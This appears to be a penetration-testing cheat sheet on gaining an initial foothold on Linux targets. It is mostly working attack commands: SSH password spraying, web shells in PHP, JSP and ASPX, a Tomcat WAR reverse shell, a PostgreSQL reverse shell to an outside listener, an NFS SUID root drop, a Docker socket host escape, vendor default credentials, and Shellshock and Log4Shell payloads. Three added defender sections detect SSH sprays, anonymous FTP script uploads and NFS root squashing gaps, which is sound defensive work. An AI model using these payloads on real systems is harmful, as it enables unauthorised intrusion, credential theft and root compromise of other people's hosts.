Initial Access

Foothold patterns on Linux. Comes after 02 Service Enum gave you a target service. For the shell mechanics, see Reverse Shells.

i. SSH

Weak password, online spray:

hydra -L users.txt -P passwords.txt ssh://"$T" -t 4 -f
nxc ssh "$T" -u users.txt -p passwords.txt

Stolen / leaked private key from web, git, exposed backup:

chmod 600 id_rsa
ssh -i id_rsa user@"$T"
## Encrypted key, crack it first:
ssh2john id_rsa > k.hash
hashcat -m 22921 k.hash "$WL"

Known username + no password set (very common on CTF and badly configured boxes):

ssh root@"$T"                          ## just try with empty password
ssh -o PreferredAuthentications=none "$T"   ## see what's accepted

Old OpenSSH version:

If the banner shows OpenSSH < 7.7 and you have user list candidates, try the user enum bug (CVE-2018-15473) to confirm valid usernames before spraying.
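A defender-side counterpart to the spray above, added here and not part of the original cheat sheet: it scans auth.log lines for one source failing across many distinct usernames and then flags any sprayer that later got an Accepted login from the same address. The sample log lines, host name and IPs are constructed.

```shell
# Constructed /var/log/auth.log excerpt (not from any real host). One source
# tries several usernames and eventually gets in; another is a normal user
# who mistyped a password and then logged in with a key.
SAMPLE_AUTH_LOG='Mar  3 10:01:02 web01 sshd[2201]: Failed password for invalid user alice from 198.51.100.7 port 41022 ssh2
Mar  3 10:01:03 web01 sshd[2202]: Failed password for invalid user bob from 198.51.100.7 port 41023 ssh2
Mar  3 10:01:04 web01 sshd[2203]: Failed password for root from 198.51.100.7 port 41024 ssh2
Mar  3 10:01:05 web01 sshd[2204]: Failed password for deploy from 198.51.100.7 port 41025 ssh2
Mar  3 10:01:06 web01 sshd[2205]: Failed password for invalid user carol from 198.51.100.7 port 41026 ssh2
Mar  3 10:02:00 web01 sshd[2210]: Failed password for deploy from 203.0.113.9 port 50001 ssh2
Mar  3 10:02:10 web01 sshd[2211]: Failed password for deploy from 203.0.113.9 port 50002 ssh2
Mar  3 10:03:00 web01 sshd[2220]: Accepted publickey for deploy from 203.0.113.9 port 50003 ssh2
Mar  3 10:04:00 web01 sshd[2230]: Accepted password for deploy from 198.51.100.7 port 41030 ssh2'

# Read a log file if one is given, else the constructed sample.
_src() { if [ -n "$1" ]; then cat "$1"; else printf '%s\n' "$2"; fi; }

# detect_spray [min_users] [logfile]: print "ip failures distinct_users" for
# each source whose failed logins cover at least min_users distinct names.
# One user with a few failures is noise; many names from one IP is a
# wordlist spray like the hydra/nxc lines above.
detect_spray() {
    _src "$2" "$SAMPLE_AUTH_LOG" | awk -v min="${1:-3}" '
        /sshd\[[0-9]+\]: Failed password for / {
            user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                # "for invalid user NAME from IP" or "for NAME from IP"
                if ($i == "for") user = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
                if ($i == "from") ip = $(i+1)
            }
            if (ip == "") next
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END { for (ip in fails) if (users[ip] >= min) print ip, fails[ip], users[ip] }'
}

# spray_then_success [min_users] [logfile]: sprayers that later got an
# "Accepted" login from the same IP, i.e. a guess that worked. Treat that
# as an incident (rotate the account), not just a lockout.
spray_then_success() {
    detect_spray "${1:-3}" "$2" | while read -r ip fails users; do
        if _src "$2" "$SAMPLE_AUTH_LOG" | grep -q "sshd\[[0-9]*\]: Accepted .* from $ip port"; then
            echo "$ip"
        fi
    done
}
```

Run against a real file with `spray_then_success 3 /var/log/auth.log`; the threshold is the number of distinct usernames, not the number of failures.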

ii. FTP

Anonymous read for creds/keys/configs:

wget -m --no-passive ftp://anonymous:anonymous@"$T"
grep -rEi 'pass|user|key|token|secret' .

Anonymous write -> web shell (when FTP root == webroot):

echo '<?php system($_GET[0]); ?>' > sh.php
ftp -nv "$T" <<EOF
user anonymous anonymous
binary
put sh.php
quit
EOF
curl "http://$T/sh.php?0=id"
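Added example, not from the original page: the server-side view of the anonymous write above. It flags anonymous uploads of script files in vsftpd.log lines and checks a vsftpd.conf for the setting combination that makes the drop possible. The log lines, config, IPs and paths are constructed.

```shell
# Constructed vsftpd.log excerpt (not from any real host). Anonymous sessions
# are logged under the mapped local account, "ftp" by default.
SAMPLE_FTP_LOG='Tue Mar  3 10:05:10 2026 [pid 3101] CONNECT: Client "198.51.100.7"
Tue Mar  3 10:05:11 2026 [pid 3100] [ftp] OK LOGIN: Client "198.51.100.7", anon password "anonymous"
Tue Mar  3 10:05:12 2026 [pid 3102] [ftp] OK UPLOAD: Client "198.51.100.7", "/sh.php", 34 bytes, 0.12Kbyte/sec
Tue Mar  3 10:06:30 2026 [pid 3110] [deploy] OK UPLOAD: Client "203.0.113.9", "/releases/app.tar.gz", 10485760 bytes, 5000.00Kbyte/sec
Tue Mar  3 10:07:00 2026 [pid 3120] [ftp] OK DOWNLOAD: Client "198.51.100.7", "/README", 120 bytes, 0.50Kbyte/sec
Tue Mar  3 10:08:00 2026 [pid 3130] [ftp] OK UPLOAD: Client "198.51.100.7", "/img/cmd.phtml", 40 bytes, 0.10Kbyte/sec'

# Constructed vsftpd.conf: the three settings that together allow the drop above.
SAMPLE_VSFTPD_CONF='anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html'

# Read a file if one is given, else the constructed sample.
_src() { if [ -n "$1" ]; then cat "$1"; else printf '%s\n' "$2"; fi; }

# anon_script_uploads [logfile]: "client path" for each successful anonymous
# upload whose filename ends in a server-side script extension.
anon_script_uploads() {
    _src "$1" "$SAMPLE_FTP_LOG" | awk '
        /\[(ftp|anonymous)\] OK UPLOAD:/ {
            split($0, q, "\"")            # q[2] = client IP, q[4] = remote path
            if (q[4] ~ /\.(php[0-9]?|phtml|phar|jspx?|aspx?|cgi|sh)$/) print q[2], q[4]
        }'
}

# audit_vsftpd_conf [conffile]: ANON_WRITE when anonymous users can upload,
# OK otherwise. Fix: anon_upload_enable=NO (or anonymous_enable=NO), and never
# point anon_root at a directory the web server executes from.
audit_vsftpd_conf() {
    _src "$1" "$SAMPLE_VSFTPD_CONF" | awk -F= '
        /^[[:space:]]*#/ { next }
        { v[$1] = toupper($2) }
        END {
            if (v["anonymous_enable"] == "YES" && v["write_enable"] == "YES" &&
                v["anon_upload_enable"] == "YES") print "ANON_WRITE"; else print "OK"
        }'
}
```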

Known backdoored versions:

  • vsftpd 2.3.4 -> :) smiley in username triggers backdoor on port 6200, msf > use exploit/unix/ftp/vsftpd_234_backdoor
  • ProFTPD 1.3.5 -> mod_copy CVE-2015-3306, copy any file via SITE CPFR/CPTO

iii. SMB

Anonymous + writable share, drop a payload users will execute:

smbclient "//$T/share" -N
## put a .lnk or .scf file with attacker IP icon for hash capture

Anonymous read, look for creds in configs/backups:

smbget -R "smb://$T/share" -U ''
grep -rEi 'pass|cred|secret' .

Known SMB exploits worth checking by version:

  • SMBv1 + Win7/2008 R2 -> MS17-010 (EternalBlue), nmap --script smb-vuln-ms17-010
  • Samba 3.5.0 - 4.4.13 -> CVE-2017-7494 (SambaCry), unauth RCE via writable share
  • Samba 4.5.0 - 4.5.15 -> CVE-2017-12150 (badlock variants)

SambaCry exploit (writable share + known share path):

msfconsole -q -x "use exploit/linux/samba/is_known_pipename; set RHOSTS $T; run"

iv. NFS misconfig

Mountable export with no_root_squash = instant root.

Check exports:

showmount -e "$T"

If no_root_squash is set on any share you can write to, this is root:

sudo mount -t nfs "$T":/export /mnt/nfs -o nolock
## Drop a SUID binary as root from attacker
cat > /mnt/nfs/r.c <<EOF
#include <unistd.h>
int main(){ setuid(0); setgid(0); execl("/bin/bash","bash","-p",NULL); }
EOF
sudo gcc /mnt/nfs/r.c -o /mnt/nfs/r
sudo chmod 4755 /mnt/nfs/r
## Now on target, as any local user:
/mounted/path/r                        ## drops to root shell via -p
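Added example (not from the original page) for the export check above: audit an /etc/exports for client entries carrying no_root_squash, the option the SUID drop depends on, and emit the squashed rewrite. The paths and client ranges are constructed.

```shell
# Constructed /etc/exports (not from any real host). Two client entries let a
# remote root keep uid 0, which is what the SUID drop above needs.
SAMPLE_EXPORTS='# build artifacts
/srv/export   10.0.0.0/24(rw,sync,no_root_squash,no_subtree_check)
/srv/public   *(ro,sync,root_squash,no_subtree_check)
/srv/home     192.168.1.10(rw,sync,no_subtree_check) 192.168.1.11(rw,no_root_squash)'

# Read a file if one is given, else the constructed sample.
_src() { if [ -n "$1" ]; then cat "$1"; else printf '%s\n' "$2"; fi; }

# unsquashed_exports [exportsfile]: "path client mode" for every client entry
# carrying no_root_squash. root_squash is the default, so an entry with
# neither keyword is squashed and is not reported. Several client(options)
# groups on one line are handled.
unsquashed_exports() {
    _src "$1" "$SAMPLE_EXPORTS" | awk '
        /^[[:space:]]*(#|$)/ { next }
        {
            for (i = 2; i <= NF; i++) {
                split($i, g, "(")              # g[1] = client, g[2] = options)
                sub(/\)$/, "", g[2])
                n = split(g[2], o, ",")
                mode = "ro"; squash = 1
                for (j = 1; j <= n; j++) {
                    if (o[j] == "rw") mode = "rw"
                    if (o[j] == "no_root_squash") squash = 0
                }
                if (!squash) print $1, g[1], mode
            }
        }'
}

# hardened_exports [exportsfile]: same file with no_root_squash turned into
# root_squash. rw exports to a wildcard client are a separate review item.
hardened_exports() {
    _src "$1" "$SAMPLE_EXPORTS" | sed 's/no_root_squash/root_squash/g'
}
```

An rw entry without no_root_squash still lets the SUID file be written but not owned by root, so squashing is the control that breaks the chain; `exportfs -ra` after editing.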

v. Web foothold patterns

Full web attack surface lives in 00 Web MOC. The common foothold chains:

  • LFI + PHP wrapper or log poisoning -> RCE
  • Unrestricted file upload -> drop a webshell
  • SSTI in Jinja2/Twig/Freemarker -> RCE
  • SQLi -> --os-shell (sqlmap) or write web shell via INTO OUTFILE
  • Deserialization in Java/PHP/Python apps
  • SSRF -> hit internal services (Redis, metadata endpoints)
  • Path traversal -> read /etc/passwd, SSH keys, app secrets
  • Known CVE: log4shell (CVE-2021-44228), Spring4Shell, Confluence CVE-2022-26134, GitLab CVE-2023-7028

Quick web shell drop after upload bypass:

## PHP
echo '<?php system($_GET[0]); ?>' > sh.php
## JSP (Tomcat)
cat > sh.jsp <<'EOF'
<%@ page import="java.util.*,java.io.*"%>
<% String c=request.getParameter("c"); Process p=Runtime.getRuntime().exec(c); BufferedReader r=new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while((l=r.readLine())!=null) out.println(l); %>
EOF
## ASP/ASPX, when the box is Linux running mono (rare)
echo '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd","/c "+Request["c"]); %>' > sh.aspx

vi. Tomcat manager

Default creds on /manager/html (tomcat:tomcat, admin:admin, tomcat:s3cret), then upload a WAR shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f war -o sh.war
curl --user 'tomcat:tomcat' --upload-file sh.war "http://$T:8080/manager/text/deploy?path=/sh"
curl "http://$T:8080/sh/"

vii. Database -> shell

MySQL with FILE priv -> write webshell to webroot:

SELECT '<?php system($_GET[0]); ?>' INTO OUTFILE '/var/www/html/sh.php';

PostgreSQL >= 9.3 -> COPY FROM PROGRAM:

DROP TABLE IF EXISTS sh; CREATE TABLE sh(x TEXT);
COPY sh FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.14.1/4444 0>&1"';

Redis -> SSH key write or webshell, see 02 Service Enum -> Redis.

MSSQL -> xp_cmdshell, see 02 Service Enum -> MSSQL.

viii. Docker socket exposed

docker -H "tcp://$T:2375" run --rm -v /:/host -it alpine chroot /host bash
## You are now root on the host

Local Docker socket (you’re a low-priv user with /var/run/docker.sock readable):

docker run -v /:/host -it alpine chroot /host bash

ix. Common appliance defaults

When a service banner suggests an appliance, try the vendor defaults first:

Service      Common default
Jenkins      admin:admin, no-auth /script
GitLab       root:5iveL!fe (very old), CVE-2023-7028 password reset
Splunk       admin:changeme
Grafana      admin:admin
Tomcat       tomcat:tomcat, tomcat:s3cret, admin:admin
Solr         no-auth admin panel
Elastic      no-auth, sometimes elastic:changeme
Couchbase    Administrator:password
MongoDB      no-auth on legacy installs
ActiveMQ     admin:admin

x. CVE-based foothold cheats

When version banner matches, jump straight to exploit:

  • Shellshock (bash <= 4.3) on CGI -> curl -H "User-Agent: () { :; }; /bin/bash -c 'id'" "http://$T/cgi-bin/test.sh"
  • Drupalgeddon2 (Drupal 7.x/8.x) -> CVE-2018-7600, public PoC
  • Log4Shell -> JNDI injection via any logged user-input, ${jndi:ldap://10.10.14.1/x}
  • Confluence OGNL (CVE-2022-26134) -> URL injection
  • Citrix Bleed (CVE-2023-4966) -> memory disclosure on NetScaler

xi. Document the foothold

Before moving to privesc, write down:

  • IP, user, how you got in, what creds you used
  • Where you dropped files, so cleanup is possible later
  • The full command chain that worked, so you can rebuild fast

Then jump to 05 Local Enum.